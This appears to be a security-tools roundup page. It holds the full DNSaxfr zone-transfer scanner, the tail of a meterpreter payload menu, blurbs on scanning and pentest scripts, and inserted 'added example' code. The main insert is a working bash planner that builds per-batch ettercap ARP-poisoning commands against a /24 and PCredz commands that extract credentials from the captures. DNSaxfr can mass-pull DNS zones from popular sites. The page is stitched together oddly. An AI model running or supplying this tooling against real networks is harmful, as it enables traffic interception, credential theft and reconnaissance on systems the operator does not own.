  echo -e " ${YELLOW}[i]${RESET}   + ${YELLOW}ASP${RESET} (meterpreter)"
  echo -e " ${YELLOW}[i]${RESET}   + ${YELLOW}Bash${RESET} (meterpreter)"
  echo -e " ${YELLOW}[i]${RESET}   + ${YELLOW}Linux${RESET} (meterpreter)"
  echo -e " ${YELLOW}[i]${RESET}   + ${YELLOW}PHP${RESET} (meterpreter)"
  echo -e " ${YELLOW}[i]${RESET}   + ${YELLOW}Python${RESET} (meterpreter)"
  echo -e " ${YELLOW}[i]${RESET}   + ${YELLOW}Windows${RESET} (meterpreter)"
  echo -e " ${YELLOW}[i]${RESET} IP will default to ${YELLOW}IP selection menu${RESET}"
  echo -e " ${YELLOW}[i]${RESET} PORT will default to ${YELLOW}443${RESET}"
  exit 1
fi

Source : https://blog.g0tmi1k.com/

DNSaxfr – Shell script for testing DNS AXFR vulnerability.


Latest Change 1/9/2015:
BIG update: added -r and -p options and more.
+ The script can now recursively test every subdomain of a vulnerable domain, drawing all of them in a customizable tree (-r option).
+ Proxychains' output can now be discarded using the -q option.
+ If a domain is vulnerable, "VULNERABLE" is colored green, otherwise "NOT VULNERABLE" is colored red.

DNSaxfr is a Shell script for testing DNS AXFR vulnerability.
Usage and Options:

Example Using DNSaxfr


Options:

-c COUNTRY_CODE Test Alexa top 500 sites by country
-h              Display the help and exit
-i              Interactive mode
-p              Use proxychains to safely query name servers
-q              Quiet mode when using proxychains (all proxychains' output is discarded)                     
-r              Test recursively every subdomain of a vulnerable domain, drawing all in a customizable tree
-z              Save the zone transfer in the wd in this form: domain_axfr.log

Tested Environments : All GNU/Linux.
DNSaxfr Script:

#!/bin/bash

########
#LICENSE                                                   
########

# DNS axfr vulnerability testing script. Please visit the project's website at: https://github.com/cybernova/DNSaxfr
# Copyright (C) 2015 Andrea 'cybernova' Dari (andreadari91@gmail.com)                                   
#                                                                                                       
# This shell script is free software: you can redistribute it and/or modify                             
# it under the terms of the GNU General Public License as published by                                   
# the Free Software Foundation, either version 2 of the License, or                                     
# any later version.                                                                   
#                                                                                                       
# This program is distributed in the hope that it will be useful,                                       
# but WITHOUT ANY WARRANTY; without even the implied warranty of                                        
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                                         
# GNU General Public License for more details.                                                          
#                                                                                                       
# You should have received a copy of the GNU General Public License                                     
# along with this shell script.  If not, see <http://www.gnu.org/licenses/>.

filter()
{
	#Only the characters found in $IFS are recognized as word delimiters.
	while read DOMAIN
	do
		DOMAIN="$(echo $DOMAIN | tr '[:upper:]' '[:lower:]')"
		DOMAINLVL=$(echo $DOMAIN | sed -e 's/\.$//' | awk -F . '{ print NF }')
		digSite $DOMAIN
	done
}

alexaTop500()
{
	for VAL in $(seq 0 19)
	do
		for DOMAIN in $(wget -qO- "http://www.alexa.com/topsites/countries;${VAL}/$1" | cat - | grep site-listing | cut -d ">" -f 7 | cut -d "<" -f 1 | tr '[:upper:]' '[:lower:]')
		do
			DOMAINLVL=$(echo $DOMAIN | sed -e 's/\.$//' | awk -F . '{ print NF }')
			digSite $DOMAIN
		done
	done
}

usage()
{
	echo "Usage: DNSaxfr.sh [OPTION...][DOMAIN...]"
	echo -e  "Shell script for testing DNS AXFR vulnerability\n"
	echo "0 ARGUMENTS:"
	echo "The script acts like a filter, reads from stdin and writes on stdout, useful for using it in a pipeline."
	echo "NOTE: It takes one domain to test per line"
	echo "1+ ARGUMENTS:"
	echo "The script tests every domain specified as argument, writing the output on stdout."
	echo "OPTIONS:"
	echo "-c COUNTRY_CODE Test Alexa top 500 sites by country"
	echo "-h              Display the help and exit"
	echo "-i              Interactive mode"
	echo "-p              Use proxychains to safely query name servers"
	echo "-q              Quiet mode when using proxychains (all proxychains' output is discarded)"
	echo "-r              Test recursively every subdomain of a vulnerable domain"
	echo "-z              Save the zone transfer in the wd in the following form: domain_axfr.log" 
}

iMode()
{
	echo -e "########\n#LICENSE\n########\n"
	echo "# DNS axfr vulnerability testing script. Please visit the project's website at: https://github.com/cybernova/DNSaxfr"
	echo "# Copyright (C) 2015 Andrea 'cybernova' Dari (andreadari91@gmail.com)"
	echo "#"
	echo "# This shell script is free software: you can redistribute it and/or modify"
	echo "# it under the terms of the GNU General Public License as published by"
	echo "# the Free Software Foundation, either version 3 of the License, or"
	echo "# any later version."
	echo "#"
	echo "# This program is distributed in the hope that it will be useful,"
	echo "# but WITHOUT ANY WARRANTY; without even the implied warranty of"
	echo "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the"
	echo "# GNU General Public License for more details."
	echo -e "\n\n"
	echo "Insert the domain you want to test (Ctrl+d to terminate):"
	while read DOMAIN
	do
		DOMAIN="$(echo $DOMAIN | tr '[:upper:]' '[:lower:]')"
		DOMAINLVL=$(echo $DOMAIN | sed -e 's/\.$//' | awk -F . '{ print NF }')
		digSite $DOMAIN
		echo "Insert the domain you want to test (Ctrl+d to terminate):"
	done
}

drawTree()
{
	unset TREE1 TREE2
	TREE1="|--"
	TREE2="|  "
	if [ "$DOMAIN" = "$1" ]
	then
		[ -n "$VULNERABLE" ] && printf "DOMAIN $1:$VULNERABLE ${GREEN}VULNERABLE!${RCOLOR}\n"
		[ -n "$NOT_VULNERABLE" ] && printf "DOMAIN $1:$NOT_VULNERABLE ${RED}NOT VULNERABLE!${RCOLOR}\n"
		return 
 	fi
	LVLDIFF=$(( $(echo $1 | sed -e 's/\.$//' | awk -F . '{ print NF }') - $DOMAINLVL))
	if [ $LVLDIFF -eq 1 ]
	then
		[ -n "$VULNERABLE" ] && printf "${TREE1}DOMAIN $1:$VULNERABLE ${GREEN}VULNERABLE!${RCOLOR}\n"
		if [ ! -n "$VULNERABLE" ]
		then
			printf "${TREE1}DOMAIN $1:$NOT_VULNERABLE ${RED}NOT VULNERABLE!${RCOLOR}\n"
		else
			[ -n "$NOT_VULNERABLE" ] && printf "${TREE2}DOMAIN $1:$NOT_VULNERABLE ${RED}NOT VULNERABLE!${RCOLOR}\n"
		fi
	else
		for i in $(seq 1 $LVLDIFF)
		do
			TREE1=" $TREE1"
			TREE2=" $TREE2"
		done
		[ -n "$VULNERABLE" ] && printf "|${TREE1}DOMAIN $1:$VULNERABLE ${GREEN}VULNERABLE!${RCOLOR}\n"
		if [ ! -n "$VULNERABLE" ]
		then
			printf "|${TREE1}DOMAIN $1:$NOT_VULNERABLE ${RED}NOT VULNERABLE!${RCOLOR}\n"
		else
			[ -n "$NOT_VULNERABLE" ] && printf "|${TREE2}DOMAIN $1:$NOT_VULNERABLE ${RED}NOT VULNERABLE!${RCOLOR}\n"
		fi
	fi
}

digSite()
{
	unset VULNERABLE NOT_VULNERABLE
	#$1 domain to test
	FILE="${DOMAIN}_axfr.log"
	NS="$($QUIET1 $PROXY dig $1 ns $QUIET2 | egrep "^$1" | awk '{ print $5 }')"
	for NSERVER in $(echo $NS)
	do
		if [ "$ZONETRAN"  = 'enabled' -a ! -f $FILE ]
		then
			if $QUIET1 $PROXY dig @$NSERVER $1 axfr $QUIET2 | tee /tmp/$FILE | egrep '[[:space:]]NS[[:space:]]' > /dev/null 2>&1
			then
				mv /tmp/$FILE .
				VULNERABLE="$VULNERABLE $NSERVER"
			else
				rm /tmp/$FILE
				NOT_VULNERABLE="$NOT_VULNERABLE $NSERVER"
			fi
		else
			if $QUIET1 $PROXY dig @$NSERVER $1 axfr $QUIET2 | egrep '[[:space:]]NS[[:space:]]' > /dev/null 2>&1
			then
				VULNERABLE="$VULNERABLE $NSERVER"
			else
				NOT_VULNERABLE="$NOT_VULNERABLE $NSERVER"
			fi
		fi
	done
	[ -n "$VULNERABLE" -o -n "$NOT_VULNERABLE" ] && drawTree $1
	if [ "$RECURSIVE" = 'enabled' -a -n "$VULNERABLE" ]
	then
		if [ -f $FILE ]
		then
			for SDOMAIN in $(egrep '[[:space:]]NS[[:space:]]' $FILE | egrep -vi "^$1" | awk '{ print $1 }' | sort -u)
			do
				digSite $SDOMAIN
			done
		else
			for SDOMAIN in $($QUIET1 $PROXY dig @$(echo $VULNERABLE | awk '{ print $1 }') $1 axfr $QUIET2 | egrep '[[:space:]]NS[[:space:]]' | egrep -vi "^$1" | awk '{ print $1 }' | sort -u)	
			do
				digSite $SDOMAIN
			done
		fi
	fi
}

parse()
{
	while getopts ':c:hipqrz' OPTION
	do
		case $OPTION in
		c)ALEXA500='enabled'; COUNTRY="$OPTARG";;
		h)usage && exit 0;;
		i)IMODE='enabled';;
		p)command -v proxychains >/dev/null 2>&1 && PROXY='proxychains' || { echo "Proxychains is not installed...exiting"; exit 3; };;
		q)QUIET1='eval'; QUIET2='2>/dev/null';;
		r)RECURSIVE='enabled';;
		z)ZONETRAN='enabled';;
		\?)
			echo "Option not recognized...exiting"
			exit 1;;
		:)  
			echo "Option -$OPTARG requires an argument"
			exit 2;;
		esac
	done	
	shift $(($OPTIND - 1))

	[ "$ALEXA500" = 'enabled' ] && alexaTop500 $COUNTRY && exit 0
	[ "$IMODE" = 'enabled' ] && iMode && exit 0

	#No arguments
	[ $# -eq 0 ] && filter && exit 0

	#Every site specified as argument is tested
	for CONT in $(seq 1 $#)
	do
	DOMAIN="$(echo ${!CONT} | tr '[:upper:]' '[:lower:]')"
	DOMAINLVL=$(echo $DOMAIN | sed -e 's/\.$//' | awk -F . '{ print NF }')
	digSite $DOMAIN
	done
}

#############
#SCRIPT START
#############
GREEN='\033[1;92m'
RED='\033[1;91m'
RCOLOR='\033[1;00m'

parse "$@"
exit 0

Source : https://github.com/cybernova
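The script decides per name server from the raw `dig ... axfr` output: any NS record in the answer means the transfer succeeded. The functions below, an added example and not part of DNSaxfr, spell that decision out over captured output so it can be checked offline, and separate "no answer" from "refused", which the script lumps together as NOT VULNERABLE; the sample output is constructed, not a real zone.

```shell
#!/bin/sh
# Added example (not DNSaxfr's own code): the per-name-server decision the
# script makes, as a function over captured dig output. A timeout or
# unreachable server is reported as ERROR rather than NOT_VULNERABLE, so a
# network failure is not logged as a hardened server.

# classify_axfr "<output of dig @ns zone axfr>" -> VULNERABLE | NOT_VULNERABLE | ERROR
classify_axfr() {
    printf '%s\n' "$1" | awk '
        # resource records are the non-comment lines: name ttl class type rdata
        $0 !~ /^;/ && NF >= 5 && $4 == "NS" { ns = 1 }
        /^;; communications error/ || /^;; connection timed out/ || /^;; no servers could be reached/ { err = 1 }
        END {
            if (ns)       print "VULNERABLE"
            else if (err) print "ERROR"
            else          print "NOT_VULNERABLE"   # includes "; Transfer failed." (refused)
        }'
}

# delegated_subzones "<dig axfr output>" apex -> the child zones the -r option
# recurses into: owners of NS records other than the apex itself, unique,
# lower-cased, without the trailing dot.
delegated_subzones() {
    printf '%s\n' "$1" | awk -v apex="$2" '
        $0 !~ /^;/ && NF >= 5 && $4 == "NS" {
            name = tolower($1); sub(/\.$/, "", name)
            if (name != apex) print name
        }' | sort -u
}

# Constructed sample output (not a real zone): a successful transfer with one
# delegated child zone, a refused transfer, and a timeout.
AXFR_OK='; <<>> DiG 9.9.5 <<>> @ns1.example.test example.test axfr
;; global options: +cmd
example.test.        3600  IN  SOA  ns1.example.test. hostmaster.example.test. 2015010901 7200 3600 1209600 3600
example.test.        3600  IN  NS   ns1.example.test.
example.test.        3600  IN  NS   ns2.example.test.
www.example.test.    3600  IN  A    192.0.2.10
dev.example.test.    3600  IN  NS   ns1.dev.example.test.
dev.example.test.    3600  IN  NS   ns2.dev.example.test.
example.test.        3600  IN  SOA  ns1.example.test. hostmaster.example.test. 2015010901 7200 3600 1209600 3600
;; Query time: 12 msec'
AXFR_REFUSED='; <<>> DiG 9.9.5 <<>> @ns2.example.test example.test axfr
;; global options: +cmd
; Transfer failed.'
AXFR_TIMEOUT='; <<>> DiG 9.9.5 <<>> @ns3.example.test example.test axfr
;; global options: +cmd
;; connection timed out; no servers could be reached'

# Demo over the three samples.
for sample in "$AXFR_OK" "$AXFR_REFUSED" "$AXFR_TIMEOUT"; do
    classify_axfr "$sample"
done
echo "child zones to recurse into:"
delegated_subzones "$AXFR_OK" example.test
```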

Bash Scanner – A fast way to scan your server for outdated software and potential exploits.


Bash Scanner is a fast and reliable way to scan your server for outdated software and potential exploits.

Bash Scanner Usage

Extended reports:
After an initial scan you will be asked to create an account on the PatrolServer dashboard. This is optional: the tool works without an account. An account adds detailed reporting together with documentation on how to secure your server.

Continuous scanning:
The script will ask whether it should install a cronjob. If you agree, your server's software inventory is re-scanned daily and you are notified by email when installed software becomes outdated.

Download : bash-scanner.zip(21.5KB)  | Clone Url
Source : https://patrolserver.com/

Discover updates ~ custom bash scripts to automate various pentesting tasks.


Latest change:
+ discover.sh: moved from the deprecated msfcli to the msfconsole -x syntax; other changes.
+ setup.sh: checks for Goofile and installs it from the setup script.

Discover Updates

For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.

Discover Console

Download, setup & usage
+ git clone git://github.com/leebaird/discover.git /opt/discover/
+ All scripts must be run from this location.
+ cd /opt/discover/
+ ./setup.sh
+ ./discover.sh

Source : https://github.com/leebaird | Our earlier post on Discover

MITM_Toolkit is a toolkit for automating MITM attack management.


MITM_Toolkit is a toolkit for automating MITM attack management with ettercap. It is a collection of scripts to assist with MITM attacks.
Incremental Poison:
This shell script accepts three arguments: the interface you are using (eth1, eth2, etc.), the number of hosts to poison concurrently, and the name of a directory for the packet captures. When launched it opens a separate gnome-terminal (so it has to be run from the desktop) and starts poisoning. To move on to the next batch, press 'q' in that terminal: ettercap shuts down gracefully, re-ARPs the hosts (to avoid disruption), and the next batch is launched. Meanwhile everything is written to an organized set of log files. Currently the script assumes the gateway is on your /24 network (so it should work out of the box 90% of the time); support for less common layouts is planned.

Interface Incremental Poison

Pcap Parser:
This shell script accepts one argument: the path to the output directory of Incremental Poison, which contains the pcap files from a poisoning run. It passes these pcaps through ettercap -r and PCredz to extract credentials from the captured traffic.

Pcap-Parser

Download : Mitm_Toolkit (62.9 KB)
Source : https://github.com/pan0pt1c0n
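The two scripts above describe a procedure: split a /24 into batches of N victims, run one ettercap ARP-poisoning session per batch that writes its own capture, then replay each capture through ettercap and PCredz. As an added example (not code from MITM_Toolkit), the functions below build those per-batch command lines so the batching and gateway handling can be inspected before anything is run. Assumptions that are mine, not the toolkit's: hosts .1 to .254 of the prefix are candidates, the gateway sits on that /24 and is carved out of every victim range, the ettercap 0.8 target syntax `/IP//` is used with `-w` to write and `-r` to replay a pcap, and PCredz takes `-f <pcap>`. Nothing here executes ettercap; the output can be reviewed and then piped to a shell.

```shell
#!/usr/bin/env bash
# Added example, not MITM_Toolkit code: per-batch ettercap command lines for
# an incremental ARP-poisoning run over a /24. Assumed, not from the page:
# hosts .1-.254, gateway on the same /24 and excluded from the victims,
# ettercap 0.8 target syntax /IP//, -w/-r for pcap write/replay, PCredz -f.

# rng FIRST LAST: "FIRST-LAST", or just FIRST when both are equal
rng() {
	if [ "$1" -lt "$2" ]; then printf '%s-%s' "$1" "$2"; else printf '%s' "$1"; fi
}

# batch_range PREFIX SIZE INDEX: first and last host octet of batch INDEX
# (0-based); fails once the index is past the end of the /24
batch_range() {
	local size="$2" idx="$3" first last
	first=$(( idx * size + 1 ))
	[ "$first" -le 254 ] || return 1
	last=$(( first + size - 1 ))
	[ "$last" -le 254 ] || last=254
	printf '%s %s\n' "$first" "$last"
}

# batch_targets PREFIX GATEWAY SIZE INDEX: ettercap victim spec for the batch
# with the gateway carved out of the range, e.g. /192.168.1.1-4,6-10//
batch_targets() {
	local prefix="$1" gw="$2" size="$3" idx="$4" range first last gwoct spec=""
	range=$(batch_range "$prefix" "$size" "$idx") || return 1
	set -- $range
	first=$1; last=$2
	gwoct="${gw##*.}"
	if [ "$gwoct" -ge "$first" ] && [ "$gwoct" -le "$last" ]; then
		[ "$gwoct" -gt "$first" ] && spec=$(rng "$first" $((gwoct - 1)))
		[ "$gwoct" -lt "$last" ] && spec="${spec:+$spec,}$(rng $((gwoct + 1)) "$last")"
	else
		spec=$(rng "$first" "$last")
	fi
	[ -n "$spec" ] || return 1   # the batch held nothing but the gateway
	printf '/%s.%s//\n' "$prefix" "$spec"
}

# poison_cmd IFACE PREFIX GATEWAY SIZE INDEX OUTDIR: the ettercap run for one
# batch: -T text UI, -q quiet, -w one pcap per batch, arp:remote so traffic
# in both directions between the victims and the gateway is captured
poison_cmd() {
	local iface="$1" prefix="$2" gw="$3" size="$4" idx="$5" outdir="$6" targets
	targets=$(batch_targets "$prefix" "$gw" "$size" "$idx") || return 1
	printf 'ettercap -T -q -i %s -w %s/batch-%s.pcap -M arp:remote /%s// %s\n' \
		"$iface" "$outdir" "$idx" "$gw" "$targets"
}

# parse_cmds OUTDIR INDEX: replay one batch's pcap through ettercap and PCredz
parse_cmds() {
	printf 'ettercap -T -q -r %s/batch-%s.pcap\n' "$1" "$2"
	printf 'Pcredz -f %s/batch-%s.pcap\n' "$1" "$2"
}

# plan_batches IFACE PREFIX GATEWAY SIZE OUTDIR: one poison command per batch,
# skipping a batch that would contain only the gateway
plan_batches() {
	local idx=0 cmd
	while batch_range "$2" "$4" "$idx" >/dev/null; do
		cmd=$(poison_cmd "$1" "$2" "$3" "$4" "$idx" "$5") && printf '%s\n' "$cmd"
		idx=$((idx + 1))
	done
}

# Usage: plan_batches eth1 192.168.1 192.168.1.1 10 /tmp/caps
```

With a batch size of 10 and the gateway at .1, the plan is 26 ettercap invocations, the first targeting `/192.168.1.2-10//`; a gateway in the middle of a batch produces a split range such as `1-4,6-10`, which keeps the router out of the victim set while still poisoning both sides of the conversation.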
